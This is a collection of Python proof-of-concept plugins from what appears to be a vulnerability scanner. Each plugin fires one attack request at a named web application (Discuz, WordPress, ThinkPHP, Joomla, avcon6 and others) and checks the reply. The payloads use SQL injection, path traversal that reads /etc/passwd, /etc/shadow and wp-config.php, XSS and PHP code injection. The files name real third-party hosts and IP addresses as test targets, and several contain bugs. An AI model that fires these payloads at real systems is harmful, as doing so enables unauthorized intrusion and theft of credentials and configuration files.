11 |     code,head,res,_,_ = curl.curl2(url,data)
12 |     if code==200 and 'testvul' in res:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('jienuohan', 'http://tg.fiberglass365.com/')[1])


--------------------------------------------------------------------------------
/plugins/yongyou_fe/238.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | # FE5.5
 4 | # http://www.wooyun.org/bugs/wooyun-2010-086697
 5 | def assign(service, arg):
 6 |     if service == "yongyou_fe":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg + '/common/treeXml.jsp?type=sort&lx=3&code=1%27'
11 |     _, head, body, _, _ = curl.curl(url)
12 |     if body and body.find('bad SQL grammar [];') != -1:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('yongyou_fe', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/dedecms/108.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'Ario'
 4 | #SSV-ID: 61188
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "dedecms":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg + "plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D"
12 |     _, head, body, _, re_url = curl.curl(url)
13 |     if head and head.find('http://www.baidu.com') != -1:
14 |         security_note(url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('dedecms', 'http://www.ceowo.com/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/seentech_uccenter/1848.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #refer:http://www.wooyun.org/bugs/wooyun-2010-0123359
 4 | 
 5 | def assign(service, arg):
 6 |     if service == 'seentech_uccenter':
 7 |         return True, arg
 8 |         
 9 | def audit(arg):
10 |     payload = "ucenter/include/getpasswd.php"
11 |     code,_,res,_,_ = curl.curl2(arg+payload)
12 |     if len(res)>0 and code ==200:
13 |         security_warning(arg+payload)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('seentech_uccenter', 'https://60.223.226.154/')[1])


--------------------------------------------------------------------------------
/plugins/avcon6/592.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = rabit2013
 4 | #_PlugName_ = avcon6 upload file
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "avcon6":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = "/voip/basemanager/dorolldata"
12 |     url = arg + payload
13 |     code, head, res, errcode, _ = curl.curl(url)
14 |     if code == 200 and 'doRollback' in res:
15 |         security_info(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('avcon6', 'http://avcon.icampus.cn:8080')[1])


--------------------------------------------------------------------------------
/plugins/shopex/103.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "shopex":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     for d in ['app/dev/', 'install/']:
10 |         url = arg + d + 'svinfo.php?phpinfo=true'
11 |         _, _, res, _, _ = curl.curl(url)
12 |         if res and res.find('<title>phpinfo()</title>') != -1:
13 |             security_info(url)
14 |             break
15 | 
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('shopex', 'http://www.finialshop.com/')[1])
20 | 


--------------------------------------------------------------------------------
/plugins/wordpress/2457.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | def assign(service, arg):
 4 |     if service == "wordpress":
 5 |         return True, arg
 6 | 
 7 | def audit(arg):
 8 |     payload = 'produits/?items_per_page=%24%7b%40print(md5(balabala))%7d&setListingType=grid'
 9 |     verify_url = arg + payload
10 |     code, head, res, errcode, _ = curl.curl2(verify_url)
11 |     if code == 200 and '4fd952b7a28daf93be5457b4318554a1' in res:
12 |         security_hole(verify_url)
13 | 
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('wordpress', 'http://www.abl-dz.com/')[1])


--------------------------------------------------------------------------------
/plugins/ecscms/1525.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #Author:judger
 4 | #SerType: ECS arbitrary file download
 5 | def assign(service, arg):
 6 | 	if service == 'ecscms':
 7 | 		return True, arg
 8 | 
 9 | def audit(arg):
10 | 	payload = "Tools/stream/FlvStream.ashx?file=./web.config"
11 | 	url = arg + payload
12 | 	code, head, body, errcode, _url = curl.curl2(url)
13 | 	if code == 200 and 'configSection' in body:
14 | 		security_warning('Arbitrary file download:'+url)
15 | 
16 | if __name__ == '__main__':
17 | 	from dummy import *
18 | 	audit(assign('ecscms', 'http://www.jhyzh.com/')[1])


--------------------------------------------------------------------------------
/plugins/rockoa/1950.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*
 3 | # rockoa物理路径泄露
 4 | 
 5 | import re
 6 | def assign(service, arg):
 7 |     if service == 'rockoa':
 8 |         return True, arg
 9 |         
10 | def audit(arg):
11 |     payload = "rock.php?m[]=login"
12 |     code,_,res,_,_ = curl.curl2(arg+payload)
13 |     if code == 500:
14 |         pk = re.findall(r'in (.*) on line', res)
15 |         if (len(pk) > 0):
16 |             security_warning(arg+':'+pk[0])
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('rockoa','http://demo.xh829.com/')[1])


--------------------------------------------------------------------------------
/plugins/vicworl/1149.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #http://www.wooyun.org/bugs/wooyun-2010-0106292
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "vicworl":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     payload = 'data/backup/VICWOR~1.SQL'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if code == 200 and 'MySQL dump' in res:
16 |         security_warning(url)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('vicworl', 'http://218.7.16.70/')[1])


--------------------------------------------------------------------------------
/plugins/cmstop/56.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | 
 4 | def assign(service, arg):
 5 |     if service != "cmstop":
 6 |         return
 7 |     return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     code, head, res, errcode, _ = curl.curl(url + 'cmstop/apps/system/view/template/edit.php')
12 |     if code == 200:
13 |         m = re.search(' in <b>([^<]+)</b> on line <b>(\d+)</b>', res)
14 |         if m:
15 |             security_info(m.group(1))
16 | 
17 | 
18 | if __name__ == '__main__':
19 |     from __loader import *
20 |     audit(assign('cmstop', 'http://www.haosax.com/')[1])
21 | 


--------------------------------------------------------------------------------
/plugins/qizhitong_manager/1545.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 | 	if service == 'qizhitong_manager':
 6 | 		return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "report/rp_download.jsp?file=/etc/passwd&null=null"
10 | 	url = arg + payload
11 | 	code, head, body, errcode, _url = curl.curl2(url)
12 | 	if code == 200 and 'root' in body and '/bin/bash' in body:
13 | 		security_warning('Arbitrary file download:'+url)
14 | 
15 | 
16 | if __name__ == '__main__':
17 | 	from dummy import *
18 | 	audit(assign('qizhitong_manager', 'http://183.63.91.226:8888/')[1])


--------------------------------------------------------------------------------
/plugins/wizbank/1819.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "wizbank":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg + "cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
10 |     code,head,res,errorcode,_url = curl.curl2(url)
11 |     if code==200 and 'log4jConfigLocation' in res :
12 |         security_hole(url)
13 |     
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('wizbank', 'http://60.247.86.31/')[1])
18 |     audit(assign('wizbank', 'http://demo.cyberwisdom.net.cn/')[1])


--------------------------------------------------------------------------------
/plugins/avcon6/593.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = rabit2013
 4 | #_PlugName_ = avcon6 upload file
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "avcon6":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload='/download.action?filename=../../../../../../etc/shadow'
12 |     url = arg+payload
13 |     code, head, res, errcode, _ = curl.curl(url)
14 |     if code == 200 and 'root' in res:
15 |         security_info(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('avcon6', 'http://221.208.241.167:8080/')[1])


--------------------------------------------------------------------------------
/plugins/feifeicms/432.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 –*-
 3 | #refer http://www.wooyun.org/bugs/wooyun-2010-060233
 4 | from re import *
 5 | def assign(service,arg):
 6 |     if service == "feifeicms":
 7 |         return True,arg
 8 | def audit(arg):
 9 |     url = arg + 'index.php?s=hits-show&sid=md5(1)%23&type=md5(1)'
10 |     
11 |     code, head, res, errcode, _ = curl.curl(url)
12 |     if code==200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
13 |         security_hole(url)
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('feifeicms','http://www.mnz123.com/')[1])


--------------------------------------------------------------------------------
/plugins/strongsoft/1875.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*
 3 | # refer: http://www.wooyun.org/bugs/wooyun-2010-063623
 4 | # 福建四创灾害预警系统配置信息泄露以及弱口令获取 strong/strong
 5 | 
 6 | def assign(service, arg):
 7 |     if service == 'strongsoft':
 8 |         return True, arg
 9 |         
10 | def audit(arg):
11 | 	vul_url = arg + "config/DataSetConfig%23.xml"
12 | 	code,_,res,_,_ = curl.curl(vul_url)
13 | 	if 'User ID' and 'password' in res:
14 |             security_hole(vul_url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('strongsoft','http://183.129.136.54:3050/')[1])


--------------------------------------------------------------------------------
/plugins/thinkphp/1832.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | import re
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "thinkphp":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     poc = arg + 'index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+'
11 |     code, head, res, errcode, _ = curl.curl(poc)
12 |     if code == 200 and 'e165421110ba03099a1c0393373c5b43' in res:
13 |         security_hole(poc +" Can be inject!")
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('thinkphp', 'http://www.binkanter.com/')[1])


--------------------------------------------------------------------------------
/plugins/seentech_uccenter/1846.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #refer:http://www.wooyun.org/bugs/wooyun-2010-0123369
 4 | 
 5 | def assign(service, arg):
 6 |     if service == 'seentech_uccenter':
 7 |         return True, arg
 8 |         
 9 | def audit(arg):
10 |     payload = "ucenter/include/globalvar_center.h"
11 |     code,_,res,_,_ = curl.curl2(arg+payload)
12 |     if code==200 and '$gMysql_host_name' in res :
13 |         security_warning(arg+payload)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('seentech_uccenter', 'https://60.223.226.154/')[1])


--------------------------------------------------------------------------------
/plugins/zhengfang/234.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | import urlparse
 4 | 
 5 | def assign(service, arg):
 6 |     if service != "zhengfang":
 7 |         return
 8 |     return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg
12 |     code, head, res, errcode, _ = curl.curl(url + 'ftb.imagegallery.aspx')
13 |     if code == 200:
14 |         m = re.search('not found in <b>([^<]+)</b> on line <b>(\d+)</b>', res)
15 |         if m:
16 |             security_info(m.group(1))
17 | 
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('zhengfang', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/avcon6/594.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = rabit2013
 4 | #_PlugName_ = avcon6 upload file
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "avcon6":
 9 |         return True, arg
10 | 
11 | 
12 | def audit(arg):
13 |     payload = "AvconWebService/fingerprint.jsp"
14 |     url = arg + payload
15 |     code, head, res, errcode, _ = curl.curl(url)
16 |     if code == 200 and "System Fingerprint" in res:
17 |         security_info(url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('avcon6', 'http://avol.nbtvu.net.cn:8080/')[1])


--------------------------------------------------------------------------------
/plugins/discuz/141.py:
--------------------------------------------------------------------------------
 1 | #Referer:http://www.wooyun.org/bugs/wooyun-2014-084097
 2 | def assign(service, arg):
 3 |     if service == "discuz":
 4 |         return True, arg
 5 | 
 6 | def audit(args):
 7 |     payload = "/admincp.php?infloat=yes&handlekey=123);alert(/testvul/);//"
 8 |     verify_url = args + payload
 9 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
10 |     if code==200 and "if($('return_123);alert(/testvul/);//'" in content:
11 |         security_info(verify_url)
12 | 
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('discuz', 'http://www.misssky.cn/')[1])
16 | 


--------------------------------------------------------------------------------
/plugins/www/1233.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # Can import any built-in Python Library
 3 | import urlparse
 4 | def assign(service, arg):
 5 |     if service != "www":
 6 |         return
 7 |     arr = urlparse.urlparse(arg)
 8 |     return True, '%s://%s/inc/conn_db.inc' % (arr.scheme, arr.netloc)
 9 | 
10 | def audit(arg):
11 |     code, head, res, errcode, final_url = curl.curl(arg)
12 |     if code == 200 and 'db_id' in res and  'db_name' in res and 'db_pass' in res:
13 |          security_warning(arg)
14 | 
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('www', 'http://61.77.63.86/')[1])


--------------------------------------------------------------------------------
/plugins/qizhitong_manager/1616.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 | 	if service == 'qizhitong_manager':
 6 | 		return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "test/downTcpdumpFile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
10 | 	url = arg + payload
11 | 	code, head, body, errcode, _url = curl.curl2(url)
12 | 	if code == 200 and 'root' in body and '/bin/bash' in body:
13 | 		security_warning('Arbitrary file download:'+url)
14 | 
15 | 
16 | if __name__ == '__main__':
17 | 	from dummy import *
18 | 	audit(assign('qizhitong_manager', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/shopbuilder/562.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #from:http://www.wooyun.org/bugs/wooyun-2014-066933
 4 | 
 5 | def assign(service,arg):
 6 |     if service == "shopbuilder":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload ="/footer.php?m=../bbccgg.txt%23"
11 |     url = arg + payload
12 |     code, head, res, errcode,finalurl =  curl.curl('"%s"' % url)
13 |     if code == 200 and 'No such file or directory' in res:
14 |         security_hole(url)
15 | 
16 | if __name__ == "__main__":
17 |     from dummy import *
18 |     audit(assign('shopbuilder', 'http://www.zgzyjczs.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/205.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '0x3D'
 4 | 
 5 | def assign(service, arg):
 6 | 	if service == 'wordpress':
 7 | 		return True, arg
 8 | 
 9 | def audit(arg):
10 | 	url = arg
11 | 	payload = '/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php'
12 | 	addr = arg + payload
13 | 	_, _, res, _, _ = curl.curl(addr)
14 | 	if 'DB_PASSWORD' in res:
15 | 		security_hole(verify_url)
16 | 
17 | if __name__ == '__main__':
18 | 	from dummy import *
19 | 	audit(assign('wordpress', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/yongyou_fe/1910.py:
--------------------------------------------------------------------------------
 1 | #/usr/bin/python
 2 | #-*- coding: utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "yongyou_fe":
 6 |         return True, arg    
 7 | 
 8 | def audit(arg):
 9 |     url = arg + "sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,21312313231231-23123121,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort"
10 |     code, head, body, errcode, _url = curl.curl2(url)
11 |     if code == 200 and '21312290108110' in body: 
12 |         security_hole(url)
13 |             
14 |     
15 |     
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('yongyou_fe', 'http://fe.hy-la.com:8088/')[1])


--------------------------------------------------------------------------------
/plugins/extmail/1161.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer http://www.wooyun.org/bugs/wooyun-2012-04854
 5 | 
 6 | def assign(service, arg): 
 7 |     if service == "extmail":
 8 |         return True, arg
 9 | 		
10 | def audit(arg): 
11 |     payload = 'extmail/cgi/env.cgi'
12 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
13 |     if code == 200 and 'SERVER_ADMIN' in res:
14 |         security_info(arg+payload)        
15 | 				
16 | if __name__ == '__main__': 
17 |     from dummy import *
18 |     audit(assign('extmail', 'http://mail.ca.suzhou.gov.cn/')[1])
19 | 	
20 | 


--------------------------------------------------------------------------------
/plugins/eyou/236.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | """
 4 | POC Name  :  eYou v4 /php/report/include/config.inc 信息泄露漏洞
 5 | Author    :  sqzr
 6 | """
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "eyou":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     url = arg
14 |     code, head, res, errcode, _ = curl.curl(url + 'php/report/include/config.inc')
15 |     if code == 200 and 'MYSQL_USER' in res:
16 |         security_info(url + 'php/report/include/config.inc)')
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('eyou', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/ns-asg/346.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'angel'
 4 | #refer :http://wooyun.org/bugs/wooyun-2014-058908
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "ns-asg":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg + "debug/show_logfile.php?filename=/etc/shadow"
12 |     code, head, res, errcode,finalurl =  curl.curl(url)
13 |     if res.find('root:$1$') != -1 :
14 |         security_hole('Local File download vulnerability:' + url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('ns-asg', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/qibocms/317.py:
--------------------------------------------------------------------------------
 1 | # !usr/bin/dev python
 2 | # encoding = utf-8
 3 | 
 4 | import re
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'qibocms':
 9 |         return True, arg
10 |     pass
11 | 
12 | 
13 | def audit(arg):
14 |     payload = "search.php?module_db[]=<h1>xss-vulnerable</h1><!--"
15 |     url = arg + payload
16 |     code, head, res, errcode, finalurl = curl.curl(url)
17 |     if code == 200:
18 |         if 'xszs-vulnerable' in res:
19 |             security_hole(url)
20 |     pass
21 | 
22 | if __name__ == "__main__":
23 |     from dummy import *
24 |     audit(assign('qibocms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/143.py:
--------------------------------------------------------------------------------
 1 | #Referer:http://sebug.net/vuldb/ssvid-61532
 2 | def assign(service, arg):
 3 |     if service == "wordpress":
 4 |         return True, arg
 5 | 
 6 | def audit(args):
 7 |     payload = "/wp-content/plugins/instasqueeze/lp/index.php?id=%22/><script>alert(233)</script>"
 8 |     verify_url = args + payload
 9 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
10 |     if code==200 and '<script>alert(233)</script>' in content:
11 |         security_info(verify_url)
12 | 
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('wordpress', 'http://www.example.com/')[1])
16 | 


--------------------------------------------------------------------------------
/plugins/discuz/1204.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | """POC Name  :  Discuz milu_seotool 插件 本地文件包含漏洞Author :  haosen"""
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "discuz":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = 'plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00'
12 |     url = arg + payload
13 |     code, head, res, errcode, _ = curl.curl(url)
14 |     if code == 200 and "User-agent" in res:
15 |         security_hole(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('discuz', 'http://code.daociyiyou.biz/')[1])


--------------------------------------------------------------------------------
/plugins/discuz/449.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'darkkid'
 4 | # Name:Discuz! X3 tools
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "discuz":
 9 |         return True, arg
10 | 
11 | 
12 | def audit(arg):
13 |     payload = 'source/plugin/tools/tools.php'
14 |     verify_url = arg + payload
15 |     code, head, res, errcode, _ = curl.curl(verify_url)
16 |     if code == 200 and "Discuz" in res:
17 |         security_warning(verify_url + ' Discuz! X3 tools')
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('discuz', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/ecshop/293.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "ecshop":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, head, res, errcode, _ = curl.curl(url + 'includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php')
11 |     if code == 200:
12 |         m = re.search('in <b>([^<]+)</b> on line <b>(\d+)</b>', res)
13 |         if m:
14 |             security_info(m.group(1))
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('ecshop', 'http://www.out521.com/shop/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/eyou/1141.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #Refer http://old.sebug.net/vuldb/ssvid-62693
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "eyou":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg
12 |     code, head, res, errcode, _ = curl.curl(url + 'user/send_queue/listCollege.php')
13 |     if code == 200:
14 |         r = re.search('MySQL result resource in <b>([^<]+)</b>',res)
15 |         if r:
16 |             security_info(r.group(1))
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('eyou', 'http://mail.hzwk.cn/')[1])


--------------------------------------------------------------------------------
/plugins/joomla/1559.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | def assign(service, arg):
 4 |     if service == 'joomla':
 5 |         return True, arg
 6 | def audit(arg):
 7 |     payload = 'index.php?option=(select+1+from+(select+count(*)%2cconcat((select+0x7465737476756c776b)%2cfloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)'
 8 |     target = arg + payload
 9 |     
10 |     code, head, res, errcode, _ = curl.curl2(target);
11 |     if 'testvulwk' in res:
12 |         security_note(target)
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('joomla', 'http://www.testvul.net/')[1])


--------------------------------------------------------------------------------
/plugins/seentech_uccenter/1526.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #Author:judger
 4 | #Sertype:中科新业网络安全审计系统V5.0任意文件下载
 5 | def assign(service, arg):
 6 | 	if service == "seentech_uccenter":
 7 | 		return True, arg
 8 | 
 9 | def audit(arg):
10 | 	payload = 'ucenter/include/get_file.php?view=../../../../../../../etc/passwd'
11 | 	url = arg + payload
12 | 	code, head, body, errcode, _url = curl.curl2(url)
13 | 	if code == 200 and 'root' in body:
14 | 		security_hole('Arbitrary file download:'+url)
15 | 
16 | if __name__ == '__main__':
17 | 	from dummy import *
18 | 	audit(assign('seentech_uccenter', 'https://219.134.131.244/')[1])


--------------------------------------------------------------------------------
/plugins/zblog/202.py:
--------------------------------------------------------------------------------
 1 | # !/usr/bin/env python
 2 | # coding = utf-8
 3 | 
 4 | """ZBLOG 1.8 /search.asp xss attack"""
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'zblog':
 9 |         return True, arg
10 | 
11 | 
12 | def audit(host):
13 |     payload = '/search.asp?q=%3Ciframe%20src%3D%40%20onload%3Dalert%281%29%3E'
14 |     url = host + payload
15 |     code, head, content, ecode, finalurl = curl.curl(url)
16 |     if code == 200 and '<iframe src=@ onload=alert(1)>':
17 |         security_info(url)
18 | 
19 | if __name__ == "__main__":
20 |     from dummy import *
21 |     audit(assign("zblog", 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/jeecms/1358.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #Author:judger
 4 | #SerType:jeecms arbitrary file download
 5 | def assign(service, arg):
 6 | 	if service == "jeecms":
 7 | 		return True, arg
 8 | 
 9 | def audit(arg):
10 | 	payload = "download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml"
11 | 	url = arg + payload
12 | 	code, head, body, errcode, _url = curl.curl2(url)
13 | 	if code == 200 and 'com.jeecms.common.web.ProcessTimeFilter' in body:
14 | 		security_hole('Arbitrary file download:'+url)
15 | 
16 | if __name__ == '__main__':
17 | 	from dummy import *
18 | 	audit(assign('jeecms', 'http://www.xxczj.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/klemanndesign/1662.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "klemanndesign":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, head, res, errcode, _ = curl.curl(url + 'index.php?pdid=1%27')
11 |     if code == 200:
12 |         m = re.search('supplied argument is not a valid MySQL result resource in <b>([^<]+)</b> on line <b>(\d+)</b>', res)
13 |         if m:
14 |             security_info(m.group(1))
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('klemanndesign', 'http://www.bmw-veteranenclub.de/')[1])


--------------------------------------------------------------------------------
/plugins/moxa_nport_router/2566.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 烽火戏诸侯
 4 | #_PlugName_ =  Moxa NPort's web console! 未授权访问
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "moxa_nport_router":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     target =arg+"main.htm"
13 |     code, head,res, errcode, _   = curl.curl2(target)
14 |     if code == 200 and 'Change Password' in res and 'Accessible IP Settings' in res:
15 |         security_hole(arg)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign("moxa_nport_router", 'http://175.138.62.157:8181/')[1])


--------------------------------------------------------------------------------
/plugins/pageadmin/1442.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-061685 
 4 | 
 5 | def assign(service, arg):
 6 |     if service == 'pageadmin':
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = 'e/database/v3.mdb'
11 |     target = arg + payload
12 |     code, head, body, errcode, final_url = curl.curl2(target)
13 |     if code == 200 and 'Content-Type: application/x-msaccess'in head:
14 |         security_warning(target)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('pageadmin', 'http://www.jixiangchansi.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/142.py:
--------------------------------------------------------------------------------
